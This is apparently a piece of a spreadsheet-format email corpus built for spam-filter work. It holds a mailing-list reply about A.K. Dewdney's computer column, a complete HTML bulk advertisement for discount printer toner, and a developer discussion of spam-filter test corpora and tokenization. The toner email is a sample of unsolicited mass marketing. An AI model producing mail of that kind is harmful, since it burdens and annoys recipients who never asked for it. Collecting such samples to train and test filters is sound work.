 &gt; Post MG in the 80's there were the colums by A K Dewdney that I dug a
 &gt; bunch put into a book  called Turing Omnibus and then there is , of
 &gt; course, all the goodens put out by Dougy Hoffstadler.
 A.K. Dewdney was the name I was looking for and the column was "Computer 
 Recreations". Turns out he's still in Ontario and even has some homemade 
 Sci-Fi online...
 http://www.csd.uwo.ca/faculty/akd/TALES/index.html
 Vat Man
 Programming Roger
 The Homunculids
 Alphie &amp; Omega
 ...Ross...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save up to 50% on laser printer, copier, and fax cartridges.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;x-tab&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;p align="center"&gt;
 &lt;b&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#000080" size="3" face="Arial"&gt;GT TONER
 SUPPLIES&lt;br&gt;Laser printer and computer supplies&lt;br&gt;
   1-866-237-7397&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;p align="center"&gt;
 &lt;img border="0" src="http://images.google.com/images?q=tbn:tGi25bBGM4oC:datadevices.home.mindspring.com/4000printer.jpg" width="81" height="69"&gt;
 &lt;img border="0" src="http://images.google.com/images?q=tbn:YoAt4rTmZ8sC:www.cartridge-fill.co.uk/groopprinter.gif" width="81" height="69"&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;i&gt;&lt;font color="#808000" face="Arial" size="4"&gt;Save up to 40% from retail price on laser printer toner
 cartridges,&lt;br&gt;
 copier and fax cartridges.&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt; &lt;/p&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;i&gt;&lt;a href="#prices"&gt;&lt;font face="Comic Sans MS" size="3" color="#0000FF"&gt;CHECK OUT OUR GREAT
 PRICES!&lt;/font&gt;&lt;/a&gt;&lt;/i&gt;
 &lt;/b&gt; &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#80000" size="3" face="Comic Sans MS"&gt;If you received this email on error, please reply to gtts1@cable.net.co with subject: REMOVE... sorry for the inconvenience.
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#808000" size="4" face="Arial"&gt;Please forward to the person responsible for purchasing your laser printer
 supplies.&lt;/font&gt;&lt;/i&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#808000"&gt;&lt;x-tab&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Order by
 phone: (toll free) 1-866-237-7397
 &lt;/font&gt;&lt;font color="#000080"&gt; &lt;br&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;&lt;x-tab&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Order by email: &lt;/font&gt;
 &lt;/font&gt;
 &lt;font color="#0000FF" face="Arial" size="3"&gt;Simply reply&lt;/font&gt;&lt;font color="#000080"&gt; this message or &lt;/font&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF" face="Arial" size="3"&gt;click here&lt;/font&gt;&lt;/a&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#808000"&gt;&amp;nbsp;
 with subject: &lt;/font&gt;&lt;font color="#000080"&gt; ORDER&lt;/font&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/b&gt; &lt;font face="Arial"&gt; &lt;b&gt; &lt;font size="2"&gt; &lt;font color="#808000"&gt;Email
 removal: &lt;/font&gt;&lt;font color="#000080"&gt;Simply reply this message or &lt;/font&gt;
 &lt;/font&gt;
 &lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font size="3" color="#0000FF"&gt;click here&lt;/font&gt;&lt;/a&gt; &lt;font size="2"&gt; &lt;font color="#808000"&gt;
 &lt;x-tab&gt;&amp;nbsp; with subject:
 &lt;/font&gt;&lt;font color="#000080"&gt; REMOVE&lt;/font&gt;&lt;font color="#808000"&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;/font&gt;
 &lt;font color="#000080" size="4"&gt;University&lt;/font&gt; &lt;font size="2"&gt;  and/or
 &lt;/font&gt;
 &lt;font color="#000080" size="4"&gt;School&lt;/font&gt;&lt;font size="3"&gt; &lt;/font&gt; &lt;font size="2"&gt; purchase
 orders WELCOME. (no credit approval required)&lt;br&gt;
 Pay by check, c.o.d, or purchase order (net 30 days).
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#000080" size="3"&gt;WE ACCEPT ALL MAJOR CREDIT CARDS!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;a href="#color"&gt;&lt;font face="Arial" size="3"&gt;New! HP 4500/4550 series color
 cartridges in stock!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;font size="2"&gt; &lt;b&gt;
 &lt;i&gt;&lt;font color="#808000" face="Arial"&gt;
 Our cartridge prices are as follows: &lt;br&gt;
 (please order by item number)&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" color="#000000" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Hewlett
      Packard&lt;a name="prices"&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;font color="#000000"&gt;&lt;b&gt;&lt;font size="2"&gt;1 -- 92274A Toner Cartridge for LaserJet 4L, 4ML, 4P, 4MP
 ------------------------$47.50&lt;br&gt;
 &lt;/font&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 &lt;font size="2"&gt;
 2 -- C4092A Black Toner Cartridge for LaserJet 1100A, ASE, 3200SE-----------------$45.50&lt;br&gt;
 &lt;/font&gt;
 &lt;/span&gt;
 &lt;font size="2"&gt;
 2A - C7115A Toner Cartridge For HP LaserJet 1000, 1200, 3330 ---------------------$55.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 2B - C7115X High Capacity Toner Cartridge for HP LaserJet 1000, 1200, 3330 -------$65.50&lt;br&gt;
 &lt;/span&gt;
 3 -- 92295A Toner Cartridge for LaserJet II, IID, III, IIID ----------------------$49.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 4 -- 92275A Toner Cartridge for LaserJet IIP, IIP+, IIIP -------------------------$55.50&lt;br&gt;
 &lt;/span&gt;
 5 -- C3903A Toner Cartridge for LaserJet 5P, 5MP, 6P, 6Pse, 6MP, 6Pxi ------------$46.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 6 -- C3909A Toner Cartridge for LaserJet 5Si, 5SiMX, 5Si Copier, 8000 ------------$92.50&lt;br&gt;
 &lt;/span&gt;
 7 -- C4096A Toner Cartridge for LaserJet 2100, 2200DSE, 2200DTN ------------------$72.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 8 - C4182X UltraPrecise High Capacity Toner Cartridge for LaserJet 8100 Series---$125.50&lt;br&gt;
 &lt;/span&gt;
 9 -- C3906A Toner Cartridge for LaserJet 5L, 5L Xtra, 6Lse, 6L, 6Lxi, 3100se------$42.50 &lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 9A - C3906A Toner Cartridge for LaserJet 3100, 3150 ------------------------------$42.50&lt;br&gt;
 &lt;/span&gt;
 10 - C3900A Black Toner Cartridge for HP LaserJet 4MV, 4V ------------------------$89.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 11 - C4127A Black Toner Cartridge for LaserJet 4000SE, 4000N, 4000T, 4000TN ------$76.50&lt;br&gt;
 &lt;/span&gt;
 11A- C8061A Black Laser Toner for HP LaserJet 4100, 4100N ------------------------$76.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 11B- C8061X High Capacity Toner Cartridge for LJ4100, 4100N ----------------------$85.50&lt;br&gt;
 &lt;/span&gt;
 11C- C4127X High Capacity Black Cartridge for LaserJet 4000SE,4000N,4000T,4000TN
 -$84.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 12 - 92291A Toner Cartridge for LaserJet IIISi, 4Si, 4SiMX -----------------------$65.50&lt;br&gt;
 &lt;/span&gt;
 13 - 92298A Toner Cartridge for LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5se, 5M, 5N
 --$46.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 14 - C4129X High Capacity Black Toner Cartridge for LaserJet 5000N ---------------$97.50&lt;br&gt;
 &lt;/span&gt;
 15 - LASERFAX 500, 700 (FX1) -----------------------------------------------------$49.00&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;
 16 - LASERFAX 5000, 7000 (FX2) ---------------------------------------------------$54.00&lt;br&gt;
 &lt;/span&gt;
 17 - LASERFAX (FX3) --------------------------------------------------------------$49.00&lt;/font&gt;&lt;/b&gt;&lt;font size="2"&gt;&lt;br&gt;
 &lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;
 18 - LASERFAX (FX4) --------------------------------------------------------------$49.00&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Hewlett Packard - Color&lt;a name="color"&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;font face="Lucida Sans Typewriter" size="2" color="#000000"&gt;C1 -- C4194a Toner
 Cartridge,
 Yellow (color lj 4500/4550 series)------------------ $ 89.50&lt;br&gt;
 &lt;/font&gt;&lt;/span&gt;&lt;font face="Lucida Sans Typewriter" size="2" color="#000000"&gt;C2 -- C4193a Toner
 Cartridge, Magenta (color lj 4500/4550 series)-----------------
 $ 89.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;C3 -- C4192a toner cartridge, cyan (color lj 4500/4550 series)-------------------- $
 89.50&lt;br&gt;
 &lt;/span&gt;C4 -- c4191a toner cartridge, black (color lj 4500/4550 series)-------------------
 $ 74.50&lt;/font&gt;&lt;/b&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Lexmark&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;tt&gt;&lt;font size="2" face="Lucida Sans Typewriter" color="#000000"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;19 - 1380520 High Yield Black Laser Toner for 4019, 4019E, 4028, 4029, 6, 10, 10L -- $109.50&lt;br&gt;
 &lt;/span&gt;20 - 1382150 High Yield Toner for 3112, 3116, 4039-10+, 4049- Model 12L,16R,
 Optra - $109.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;21 - 69G8256 Laser Cartridge for Optra E,
 E+, EP, ES, 4026, 4026 (6A,6B,6D,6E)&amp;nbsp; ---- $ 49.00&lt;br&gt;
 &lt;/span&gt;22 - 13T0101 High Yield Toner Cartridge for Lexmark Optra E310, E312, E312L -------- $ 89.00&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;23 - 1382625 High-Yield Laser Toner Cartridge for Lexmark Optra S (4059) ----------- $129.50&lt;br&gt;
 &lt;/span&gt;24 - 12A5745 High Yield Laser Toner for Lexmark Optra T610, 612, 614 (4069) -------- $165.00&lt;/b&gt;&lt;/font&gt;&lt;/tt&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt; &lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Epson&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;25
 ---- S051009 Toner Cartridge for Epson EPL7000, 7500, 8000+ - $115.50&lt;br&gt;
 &lt;/span&gt;25A --- S051009 LP-3000 PS 7000 -------------------------------- $115.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;26 ---- AS051011 Imaging Cartridge for
 ActionLaser-1000, 1500 -- $ 99.50&lt;br&gt;
 &lt;/span&gt;26A --- AS051011 EPL-5000, EPL-5100, EPL-5200 ------------------ $ 99.50&lt;br&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Panasonic&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;font color="#000000" face="Lucida Sans Typewriter" size="2"&gt;&lt;b&gt;27
 ------Nec series 2 models 90 and 95 ---------------------- $109.50&lt;br&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Apple&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;tt&gt;&lt;b&gt;&lt;font face="Courier New" size="2" color="#000000"&gt;&lt;span style="background-color: #C4C4A6"&gt;28 ---- 2473G/A Laser Toner for LaserWriter Pro 600, 630, LaserWriter 16/600 PS -
 $ 57.50&lt;br&gt;
 &lt;/span&gt;29 ---- 1960G/A Laser Toner for Apple LaserWriter Select, 300, 310, 360 --------- $
 71.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;30 ---- M0089LL/A Toner Cartridge for Laserwriter 300, 320 (74A) ---------------- $
 52.50&lt;br&gt;
 &lt;/span&gt;31 ---- M6002 Toner Cartridge for Laserwriter IINT, IINTX, IISC, IIF, IIG (95A) - $
 47.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;31A --- M0089LL/A Toner Cartridge for Laserwriter
 LS, NT, NTR, SC (75A) --------- $
 55.50&lt;br&gt;
 &lt;/span&gt;32 ---- M4683G/A Laser Toner for LaserWriter 12, 640PS --------------------------
 $ 85.50&lt;br&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Canon&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;33 --- Fax
 CFX-L3500, CFX-4000 CFX-L4500, CFX-L4500IE &amp;amp; IF FX3 ----------- $ 49.50&lt;br&gt;
 &lt;/span&gt;33A -- L-250, L-260i, L-300 FX3 ------------------------------------------
 $ 49.50&lt;br&gt;
 &lt;span style="background-color: #C4C4A6"&gt;33B -- LASER CLASS 2060, 2060P, 4000 FX3 ---------------------------------
 $ 49.50&lt;br&gt;
 &lt;/span&gt;34 --- LASER CLASS 5000, 5500, 7000, 7100, 7500, 6000 FX2 ----------------
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 35 --- FAX 5000 FX2 ------------------------------------------------------
 $ 49.50&lt;br&gt;
 &lt;/span&gt;36 --- LASER CLASS 8500, 9000, 9000L, 9000MS, 9500, 9500 MS, 9500 S FX4 --
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 36A -- Fax L700,720,760,770,775,777,780,785,790, &amp;amp; L3300 FX1
 ------------- $ 49.50&lt;br&gt;
 &lt;/span&gt;36B -- L-800, L-900 FX4 --------------------------------------------------
 $ 49.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 37 --- A30R Toner Cartridge for PC-6, 6RE, 7, 11, 12 ---------------------
 $ 59.50&lt;br&gt;
 &lt;/span&gt;38 --- E-40 Toner Cartridge for PC-720, 740, 770, 790,795, 920, 950, 980 -
 $ 85.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 38A -- E-20 Toner Cartridge for PC-310, 325, 330, 330L, 400, 420, 430 ----
 $ 85.50&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;&lt;/span&gt;&lt;/font&gt;
 &lt;/tt&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Lucida Sans Typewriter" size="3"&gt;Item&amp;nbsp;&amp;nbsp;
 Xerox&amp;nbsp;&amp;nbsp;&amp;nbsp; Price&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;tt&gt;&lt;font color="#000000" size="2" face="Lucida Sans Typewriter"&gt;&lt;b&gt;&lt;span style="background-color: #C4C4A6"&gt;39 ---- 6R900 75A ---- $ 55.50&lt;br&gt;
 &lt;/span&gt;40 ---- 6R903 98A ---- $ 46.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 41 ---- 6R902 95A ---- $ 49.50&lt;br&gt;
 &lt;/span&gt;42 ---- 6R901 91A ---- $ 65.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 43 ---- 6R908 06A ---- $ 42.50&lt;br&gt;
 &lt;/span&gt;44 ---- 6R899 74A ---- $ 47.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 45 ---- 6R928 96A ---- $ 72.50&lt;br&gt;
 &lt;/span&gt;46 ---- 6R926 27X ---- $ 84.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 47 ---- 6R906 09A ---- $ 92.50&lt;br&gt;
 &lt;/span&gt;48 ---- 6R907 4MV ---- $ 89.50&lt;span style="background-color: #C4C4A6"&gt;&lt;br&gt;
 49 ---- 6R905 03A ---- $ 46.50&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/tt&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#808000" size="3" face="Arial"&gt;30 Day unlimited warranty included on all
 products&lt;br&gt;
 GT Toner Supplies guarantees these cartridges to be free from defects in
 workmanship and material.&lt;/font&gt;&lt;/i&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#0000FF" size="3" face="Arial"&gt;We look
 forward in doing business with you.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#0000FF" size="3" face="Arial"&gt;Customer&amp;nbsp;
 Satisfaction guaranteed&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;font size="2" face="Arial"&gt;&lt;b&gt;I&lt;font color="#000080"&gt;f you are ordering by e-mail or
 c.o.d. please fill out an order&lt;br&gt;
 form with the following information:&lt;/font&gt;&lt;font color="#808000"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;font color="#000080"&gt;
 &lt;/font&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;font color="#000080" face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;font color="#0000FF"&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;font color="#000080"&gt;&lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color="#808000"&gt;phone number&lt;br&gt;
 company name&lt;br&gt;
 first and last name&lt;br&gt;
 street address&lt;br&gt;
 city, state zip code&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;i&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF"&gt;Order Now&lt;/font&gt;&lt;/a&gt; &lt;/i&gt;&lt;font color="#000080"&gt;or
 call toll free &lt;/font&gt;&lt;font size="3" color="#0000FF"&gt; 1-866-237-7397&lt;/font&gt; &lt;/b&gt;&lt;/font&gt;
 &lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;font color="#808000"&gt;&lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font color="#000080"&gt;If you are ordering by purchase order please fill out an order form&lt;br&gt;
 with the following information:&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;font color="#000080" face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" color="#808000" size="2"&gt;purchase order number&lt;br&gt;
 phone number&lt;br&gt;
 company or school name&lt;br&gt;
 shipping address and billing address&lt;br&gt;
 city, state zip code&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;&lt;i&gt;&lt;a href="mailto:gtts1@cable.net.co"&gt;&lt;font color="#0000FF"&gt;Order
 Now&lt;/font&gt;&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font size="2"&gt;&lt;i&gt;&lt;font color="#800000" size="2" face="Arial"&gt;All trade marks and brand names listed above are property
 of the respective&lt;br&gt;
 holders and used for descriptive purposes only.&lt;/font&gt;
 &lt;/i&gt;
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;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</si>
  <si>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[Anthony Baxter]
 &gt; I've got a test set here that's the last 3 and a bit years email to
 &gt; info@ekit.com and info@ekno.com - it's a really ugly set of 20,000+
 &gt; messages, currently broken into 7,000 spam, 9,000 ham, 9,000 currently
 &gt; unclassified. These addresses are all over the 70-some different
 &gt; ekit/ekno/ISIConnect websites, so they get a LOT of spam.
 &gt;
 &gt; As well as the usual spam, it also has customers complaining about
 &gt; credit card charges, it has people interested in the service and
 &gt; asking questions about long distance rates, &amp;c &amp;c &amp;c. Lots and lots
 &gt; of "commercial" speech, in other words. Stuff that SA gets pretty
 &gt; badly wrong.
 Can this corpus be shared?  I suppose not.
 &gt; I'm currently mangling it by feeding all parts (text, html, whatever
 &gt; else :) into the filters, as well as both a selected number of headers
 &gt; (to, from, content-type, x-mailer), and also a list of (header,
 &gt; count_of_header). This is showing up some nice stuff - e.g. the
 &gt; X-uidl that stoopid spammers blindly copy into their messages.
 If we ever &lt;wink&gt; have a shared corpus, an easy refactoring of timtest
 should allow to plug in different tokenizers.  I've only made three changes
 to Graham's algorithm so far (well, I've made dozens -- only three survived
 testing as proven winners), all the rest has been refining the tokenization
 to provide better clues.
 &gt; I did have Received in there, but it's out for the moment, as it causes
 &gt; rates to drop.
 That's ambiguous.  Accuracy rates or error rates, ham or spam rates?
 &gt; I'm also stripping out HTML tags, except for href="" and src="" - there's
 &gt; so so much goodness in them (note that I'm only keeping the contents of
 &gt; the attributes).
 Mining embedded http/https/ftp thingies cut the false negative rate in half
 in my tests (not keying off href, just scanning for anything that "looked
 like" one); that was the single biggest f-n improvement I've seen.  It
